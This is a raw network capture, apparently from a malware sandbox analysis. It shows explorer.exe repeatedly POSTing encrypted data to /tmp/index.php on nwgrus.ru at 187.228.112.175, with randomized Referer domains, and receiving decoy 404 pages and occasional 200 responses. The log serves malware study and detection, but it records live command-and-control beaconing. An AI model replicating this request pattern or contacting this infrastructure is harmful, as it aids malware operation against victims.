                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              11192.168.2.849717187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:38:03.036783934 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://yanbtiwxewyyhy.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 200
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:38:03.036797047 CEST200OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 71 5f c4 fd
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuq_H)ut8-XOps>9"FV'&;QA\~I1M"rmLXTfIZb6;Q
                                                                                                                                                              Sep 30, 2024 15:38:03.993493080 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:03 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              12192.168.2.849718187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:38:04.003530025 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://frpabbqmujgvx.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 190
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:38:04.003530025 CEST190OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 47 17 e3 86
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuGu9Nl2,?}{'g.fC~r9;12(T2<vj\J;5=x,&
                                                                                                                                                              Sep 30, 2024 15:38:04.966228008 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:04 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              13192.168.2.849719187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:38:04.983519077 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ybeufjfqrbhah.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 131
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:38:04.983542919 CEST131OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 45 0d a5 f2
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuE4Q^jk<dZ;cN5F#
                                                                                                                                                              Sep 30, 2024 15:38:05.963044882 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:05 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              14192.168.2.849720187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:38:06.002381086 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://astksdjaitsnxo.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 294
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:38:06.002381086 CEST294OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 50 0f fd a9
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuPk|ttfy*kOBL#zXx6&~t5/54_qWd]nN1E.VyQj^Nrqi3=k
                                                                                                                                                              Sep 30, 2024 15:38:06.991324902 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:06 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              15192.168.2.849721187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:38:06.999398947 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ssdmhljrxull.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 309
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:38:06.999423981 CEST309OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 22 31 a4 89
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vu"1ojpu((o/n-xJ>n=S#EOSQ0Az<o+XG6T3FMU9(*1w@=&0pzk,Q79
                                                                                                                                                              Sep 30, 2024 15:38:07.965688944 CEST137INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:07 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              16192.168.2.849722187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:38:07.980631113 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://mshenhcpddejse.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 328
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:38:07.980665922 CEST328OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 37 05 a2 f5
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vu7oDXeA`oiN!qbw*>Mz)D,)`]<F_ fz4R/}%`y| Ydc+&92w
                                                                                                                                                              Sep 30, 2024 15:38:08.937695026 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:08 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              17192.168.2.849723187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:38:08.952717066 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://pjefvbuybfqlgx.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 362
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:38:08.952750921 CEST362OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 32 22 b0 eb
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vu2"bWQ{l!\Ym{W@_"X^>.e/n7!$-3z%Tz_:>wJ/bxBWU)jj]O
                                                                                                                                                              Sep 30, 2024 15:38:09.905338049 CEST137INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:09 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              18192.168.2.849724187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:38:09.913422108 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://fufaecmkeyed.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 205
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:38:09.913439989 CEST205OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 64 0d ff 8e
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vudWDzd>K(~,i0EIFbD9Als':wuZIAS4moZgV'
                                                                                                                                                              Sep 30, 2024 15:38:10.884675980 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:10 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              19192.168.2.849725187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:38:10.893543959 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://naauncqsbvtxnxe.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 299
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:38:10.893594980 CEST299OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 43 5e ee 9f
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuC^$AD4__F39qH/iVDrN8%1BS'6T> hfd-LO=Lh+6d#'zrPl9~ihqsE,
                                                                                                                                                              Sep 30, 2024 15:38:11.851602077 CEST189INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:11 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb
                                                                                                                                                              Data Ascii: #\6Y9l_m=rA


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              20192.168.2.849728187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:38:16.487369061 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://lcpcrwvedbvpllck.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 267
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:38:16.487404108 CEST267OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 18 6b 2c 90 f4 76 0b 75 7e 3c e9 ac
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA ,[k,vu~<SaXZIgVg+:-CpR<_O@ERmA&,pT@P^9>B-kei!/.Q5b-0Nilutc%[+
                                                                                                                                                              Sep 30, 2024 15:38:17.653270006 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:17 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
